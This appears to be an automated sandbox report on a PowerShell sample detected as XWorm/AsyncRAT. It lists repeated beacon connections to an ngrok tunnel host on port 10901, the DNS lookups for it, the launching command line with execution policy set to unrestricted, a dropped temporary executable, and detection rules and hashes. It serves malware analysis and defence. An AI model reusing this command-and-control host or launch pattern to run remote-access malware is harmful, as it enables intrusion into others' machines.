                                                                                      Jan 30, 2025 10:39:36.980777979 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.761590004 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.762521029 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.766438961 CET109015768518.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:42.767414093 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:42.767535925 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.779767036 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.784558058 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:44.419195890 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:44.419290066 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.261502981 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.262667894 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.266328096 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:46.267430067 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:46.267699957 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.276721001 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.281562090 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:47.902784109 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:47.902956963 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.667932034 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.671227932 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.672914028 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:50.676090956 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:50.676306009 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.688138962 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.692985058 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:52.306368113 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:52.306462049 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.230230093 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.231309891 CET5768910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.235234022 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:56.236200094 CET109015768918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:56.236273050 CET5768910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.249556065 CET5768910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.254429102 CET109015768918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:57.889343977 CET109015768918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:57.889481068 CET5768910901192.168.2.718.192.93.86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 30, 2025 10:35:21.972789049 CET | 56957 | 53 | 192.168.2.7 | 1.1.1.1
Jan 30, 2025 10:35:21.983191967 CET | 53 | 56957 | 1.1.1.1 | 192.168.2.7
Jan 30, 2025 10:35:48.939321995 CET | 53 | 61641 | 162.159.36.2 | 192.168.2.7
Jan 30, 2025 10:35:49.445229053 CET | 55235 | 53 | 192.168.2.7 | 1.1.1.1
Jan 30, 2025 10:35:49.452373981 CET | 53 | 55235 | 1.1.1.1 | 192.168.2.7
Jan 30, 2025 10:35:51.624041080 CET | 54063 | 53 | 192.168.2.7 | 1.1.1.1
Jan 30, 2025 10:35:51.643030882 CET | 53 | 54063 | 1.1.1.1 | 192.168.2.7
Jan 30, 2025 10:36:53.950140953 CET | 51621 | 53 | 192.168.2.7 | 1.1.1.1
Jan 30, 2025 10:36:53.958761930 CET | 53 | 51621 | 1.1.1.1 | 192.168.2.7
Jan 30, 2025 10:37:54.435703039 CET | 62102 | 53 | 192.168.2.7 | 1.1.1.1
Jan 30, 2025 10:37:54.452755928 CET | 53 | 62102 | 1.1.1.1 | 192.168.2.7
Jan 30, 2025 10:38:58.936367989 CET | 50998 | 53 | 192.168.2.7 | 1.1.1.1
Jan 30, 2025 10:38:58.945949078 CET | 53 | 50998 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 30, 2025 10:35:21.972789049 CET | 192.168.2.7 | 1.1.1.1 | 0x2c11 | Standard query (0) | 2.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:35:49.445229053 CET | 192.168.2.7 | 1.1.1.1 | 0x5819 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 30, 2025 10:35:51.624041080 CET | 192.168.2.7 | 1.1.1.1 | 0x498a | Standard query (0) | 2.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:36:53.950140953 CET | 192.168.2.7 | 1.1.1.1 | 0x56c2 | Standard query (0) | 2.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:37:54.435703039 CET | 192.168.2.7 | 1.1.1.1 | 0xd940 | Standard query (0) | 2.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:38:58.936367989 CET | 192.168.2.7 | 1.1.1.1 | 0xbcf6 | Standard query (0) | 2.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 30, 2025 10:35:21.983191967 CET | 1.1.1.1 | 192.168.2.7 | 0x2c11 | No error (0) | 2.tcp.eu.ngrok.io | | 3.126.37.18 | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:35:49.452373981 CET | 1.1.1.1 | 192.168.2.7 | 0x5819 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 30, 2025 10:35:51.643030882 CET | 1.1.1.1 | 192.168.2.7 | 0x498a | No error (0) | 2.tcp.eu.ngrok.io | | 3.127.138.57 | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:36:53.958761930 CET | 1.1.1.1 | 192.168.2.7 | 0x56c2 | No error (0) | 2.tcp.eu.ngrok.io | | 18.157.68.73 | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:37:54.452755928 CET | 1.1.1.1 | 192.168.2.7 | 0xd940 | No error (0) | 2.tcp.eu.ngrok.io | | 18.197.239.5 | A (IP address) | IN (0x0001) | false
Jan 30, 2025 10:38:58.945949078 CET | 1.1.1.1 | 192.168.2.7 | 0xbcf6 | No error (0) | 2.tcp.eu.ngrok.io | | 18.192.93.86 | A (IP address) | IN (0x0001) | false

                                                                                      Target ID:1
                                                                                      Start time:04:35:15
                                                                                      Start date:30/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1"
                                                                                      Imagebase:0x7ff741d30000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:04:35:15
                                                                                      Start date:30/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff75da10000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:04:35:18
                                                                                      Start date:30/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\Temp\tmpB20E.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\tmpB20E.exe"
                                                                                      Imagebase:0xf10000
                                                                                      File size:33'280 bytes
                                                                                      MD5 hash:F5302ED0307CE30D226D50A45A0DCA9D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Joe Security
                                                                                      • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Sekoia.io
                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: ditekSHen
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 72%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Executed Functions

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1374559675.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac5b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                      • Instruction ID: 60d966cfca8837c1e02843e0c406bab2d0bb224080e14aa2f4855be8fd55994f
                                                                                      • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                      • Instruction Fuzzy Hash: 2A01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E881CB45

                                                                                      Non-executed Functions

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1374559675.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac5b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (0$8,$P/$p0$-$/
                                                                                      • API String ID: 0-3999472803
                                                                                      • Opcode ID: aef3f0f8af673bce50ff9bb4f5c40aab03d3db4ad82889c351505f802f28cd7c
                                                                                      • Instruction ID: 79ce21de1b0bb0cab0a32e2f180c263266b9fc69e2d0ff936bf44cfd23f462c4
                                                                                      • Opcode Fuzzy Hash: aef3f0f8af673bce50ff9bb4f5c40aab03d3db4ad82889c351505f802f28cd7c
                                                                                      • Instruction Fuzzy Hash: AF21438394F7C24FF31687A42826139AE99AFD3250B19D4FBE0CC865DBA845CD4883C2

                                                                                      Executed Functions

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3dbe3807a392b5b90ad742c15ad6a86fd8a5fd84708ab415ee58ee0118aa02f8
                                                                                      • Instruction ID: 116786e74fcaf9b5d3142a1f6b84f647f11172a6bbbcb89454fcc023180dac4d
                                                                                      • Opcode Fuzzy Hash: 3dbe3807a392b5b90ad742c15ad6a86fd8a5fd84708ab415ee58ee0118aa02f8
                                                                                      • Instruction Fuzzy Hash: E8F1B470908A4E8FEBA8EF28C8557E97BD1FF55310F04826AE84DC7292DF34D9458B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7bbd8dabfdcaed91ead00eaca802cefd2e85c3ca10be2b62f5eb8bba2e6c636
                                                                                      • Instruction ID: 408e4704f36da7d79abf3b8360532495e0b4ed3d5717d135ee7ef5ac45fa21ea
                                                                                      • Opcode Fuzzy Hash: c7bbd8dabfdcaed91ead00eaca802cefd2e85c3ca10be2b62f5eb8bba2e6c636
                                                                                      • Instruction Fuzzy Hash: 15E1B570508A4E8FEB68EF28C8567E97BD1FF55310F04826AE84DC7291DE74E9458BC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &M_
                                                                                      • API String ID: 0-654913119
                                                                                      • Opcode ID: 882220272741732d0182c7f03fee3219b3f12075925737f92680c566b38a92db
                                                                                      • Instruction ID: e502e2757dd9bac0748c30c894c67ca9d0e3737573c0a3606bdec52c69529740
                                                                                      • Opcode Fuzzy Hash: 882220272741732d0182c7f03fee3219b3f12075925737f92680c566b38a92db
                                                                                      • Instruction Fuzzy Hash: FD023AA2E1EA878BF359972C98651B57FD5EF56310B0481BAE08EC71D3FD1C980A83D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0?
                                                                                      • API String ID: 0-4267706699
                                                                                      • Opcode ID: 9f22f2dd8655efef36c50718234f0a5f0175c6ff693c11ec3f8e155619493ddc
                                                                                      • Instruction ID: 4ebee8026c102d956d9859537ebcbf9a4dc57765c822f208779d7d7ca05e1088
                                                                                      • Opcode Fuzzy Hash: 9f22f2dd8655efef36c50718234f0a5f0175c6ff693c11ec3f8e155619493ddc
                                                                                      • Instruction Fuzzy Hash: A251AF70909A5DCFEB9CEB28C459AA97BE1FF56315F00416EE00ED3692DB35D8058B80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0?
                                                                                      • API String ID: 0-4267706699
                                                                                      • Opcode ID: 192795b77a8c026c2e618af4287f5bb453c15b648cea56e2b3e2cd8443385c4c
                                                                                      • Instruction ID: 31d1fc65aadcb7c3609539af34f7474071fa049d2ebbd69e9f6a507b981c6714
                                                                                      • Opcode Fuzzy Hash: 192795b77a8c026c2e618af4287f5bb453c15b648cea56e2b3e2cd8443385c4c
                                                                                      • Instruction Fuzzy Hash: B5418D74909A1DCFEB9CEF28C459BA97BE1FB55305F00416EE00ED3692DB35E8428B80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d
                                                                                      • API String ID: 0-2564639436
                                                                                      • Opcode ID: 6aced895bef4ab0aef46f6a02ec6b18e4b3629d2c23487b906c722bd254352da
                                                                                      • Instruction ID: d62e0704fb015627d7e58feb8ba2de6e26136d2ae9ef0519eef38d2ac0ddc2e7
                                                                                      • Opcode Fuzzy Hash: 6aced895bef4ab0aef46f6a02ec6b18e4b3629d2c23487b906c722bd254352da
                                                                                      • Instruction Fuzzy Hash: BA21CF31C4D25ACFEB04ABA4C8056F9BBF4EF4A390F0541BAE44DD7192EB2C944987E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce82ecaaea305696be8f1c801342a93a297b523f704a9f4fcdf1c679b9779431
                                                                                      • Instruction ID: e20bff5eded4afad62bb0323efdd07a193f8629b324dfa8e039127c819439d2c
                                                                                      • Opcode Fuzzy Hash: ce82ecaaea305696be8f1c801342a93a297b523f704a9f4fcdf1c679b9779431
                                                                                      • Instruction Fuzzy Hash: 32A128A1E1C94A8BF798AB3C84556B9ABD6EF99340F544179F04FD32D3ED289C0687C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a1a90ddd61119e8a170e7d44f137bfaf01efe0135a1e7b3f429b1d266355611
                                                                                      • Instruction ID: 70c89aad176e0080ed6cf3ba80112f686d50b7f307d659cd2e8eb5be0fe5ae19
                                                                                      • Opcode Fuzzy Hash: 9a1a90ddd61119e8a170e7d44f137bfaf01efe0135a1e7b3f429b1d266355611
                                                                                      • Instruction Fuzzy Hash: B8B1A570508A4E8FEB69EF28C8557E93BE1FF55310F04826EE44DC7292DE349945CB82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b01aa3d0536b4210ac5707d5ffe0d326599aaaed81c365f04928a003805baa11
                                                                                      • Instruction ID: 65954c8f1dac7e45ae5b1719babae06235322801332b943f1bb3f47993a29d38
                                                                                      • Opcode Fuzzy Hash: b01aa3d0536b4210ac5707d5ffe0d326599aaaed81c365f04928a003805baa11
                                                                                      • Instruction Fuzzy Hash: 40A139A1E1DA4A8BF798A73C84556B9ABD2EF99340F544179F04FD32D3ED289C0683C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63f908791b04f461ece4893382dc325b7a5376c4aa6d87c43a577e926f31921c
                                                                                      • Instruction ID: bcb81ee0ccaddda3a36028c23da8fe6c506237583339f8bdc09287bde01c117c
                                                                                      • Opcode Fuzzy Hash: 63f908791b04f461ece4893382dc325b7a5376c4aa6d87c43a577e926f31921c
                                                                                      • Instruction Fuzzy Hash: AEA1A46071C9469BE788B77CC85577AB7D6EFA9300F648175E00EC37A7DD2CA84183A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d90a1011a7e7656d1e11d02000a3da5d2c96e569952684ae0247bf070b814a03
                                                                                      • Instruction ID: 0d625f4fd31105c21d678556f7c6761c19ea8885237e42aed37a28442ff7de6f
                                                                                      • Opcode Fuzzy Hash: d90a1011a7e7656d1e11d02000a3da5d2c96e569952684ae0247bf070b814a03
                                                                                      • Instruction Fuzzy Hash: F9210862D0EB8A8FF746A32868254B97FA5EF56250B0541F7E04DC7193EC189C0943E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b6e2da55b20b138fa02a4f2c99cdb656f247c230f2b2c8b5cf9cfda1f78f742
                                                                                      • Instruction ID: 46256b39ffda43deb394dac421ff736e273f1453c99c7e5a796f4df0635cf8dd
                                                                                      • Opcode Fuzzy Hash: 1b6e2da55b20b138fa02a4f2c99cdb656f247c230f2b2c8b5cf9cfda1f78f742
                                                                                      • Instruction Fuzzy Hash: B8517170D08A0D8FDB58EF68D845BE9BBF1FF59310F1082AAD44DD3652DA34A946CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7d8dc89bb2175b7f271f2ccebc83639efc40eebb8c60fe2291a5c22530044743
                                                                                      • Instruction ID: 0c35cdba028e61ddbd82521a7cf1077354e4a9c8fe8a890e292d7642190a5758
                                                                                      • Opcode Fuzzy Hash: 7d8dc89bb2175b7f271f2ccebc83639efc40eebb8c60fe2291a5c22530044743
                                                                                      • Instruction Fuzzy Hash: 0751F9A1E59A4E8FE798F77884696BD7BD6FF8921078085B9F00FD31C7DD2898058390
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b581cd11ad18553548321101cc8d0ec58914683ccb9071a57e36f3f13da2d45e
                                                                                      • Instruction ID: 7803745d41173e76597b8424e04d7842ee3f785bd60232ca5b3c4c62662973f3
                                                                                      • Opcode Fuzzy Hash: b581cd11ad18553548321101cc8d0ec58914683ccb9071a57e36f3f13da2d45e
                                                                                      • Instruction Fuzzy Hash: CF515B71A095498FEB98E738C859AF97BE5EF59310F1441BAE00DD32A3DD28EC42C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f79d9e1579909e2b588bd3aa28850b076f92636173a76a71c2d39fa88130338
                                                                                      • Instruction ID: 0bfe26fd164f95d40c61870fd0822e786eff3f474b179e838e355de8e17ae044
                                                                                      • Opcode Fuzzy Hash: 4f79d9e1579909e2b588bd3aa28850b076f92636173a76a71c2d39fa88130338
                                                                                      • Instruction Fuzzy Hash: 6351017090C64DCFE708DB68D855AB87BF0EF56314F04816AE00EC72A3DA29A8468B91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3de033272ec281eadf6591a11f1a6bfb690d0669fc03c64a3e8b46e1284436d1
                                                                                      • Instruction ID: 48bccf3bee700d6577c3a3f2809c0e9cf816891a6c78099bd1b35a48151ae583
                                                                                      • Opcode Fuzzy Hash: 3de033272ec281eadf6591a11f1a6bfb690d0669fc03c64a3e8b46e1284436d1
                                                                                      • Instruction Fuzzy Hash: 82518270908A1C8FDB58DF68D845BE9BBF1FB59310F0082AAD04DE3252DE34A9858FC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f77e7f342dab3ca0b0469cd48659c194e64bcabaeefb1fdc8fe8416cc853e0b0
                                                                                      • Instruction ID: 53a847c656dde0aa31cf140d9b78e450aa6d4367762e851290ae91a672248982
                                                                                      • Opcode Fuzzy Hash: f77e7f342dab3ca0b0469cd48659c194e64bcabaeefb1fdc8fe8416cc853e0b0
                                                                                      • Instruction Fuzzy Hash: 81512531D0D6868FE74A977484126A6BFA1EF17310F1842F9E09AC71D3DE2CA846C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5930c67fa735bde671ace24ab925ed06874b12e46afcfcbcdc190993a1a66e68
                                                                                      • Instruction ID: 612a8e4995ed50e477c0b2bca23575bc82f20dcbfc74b08be37ebcecba5f982a
                                                                                      • Opcode Fuzzy Hash: 5930c67fa735bde671ace24ab925ed06874b12e46afcfcbcdc190993a1a66e68
                                                                                      • Instruction Fuzzy Hash: 4F411761F1D94A4FF399B73CD446A797BC6EF96211B0484B9E44EC3293ED18AC428381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
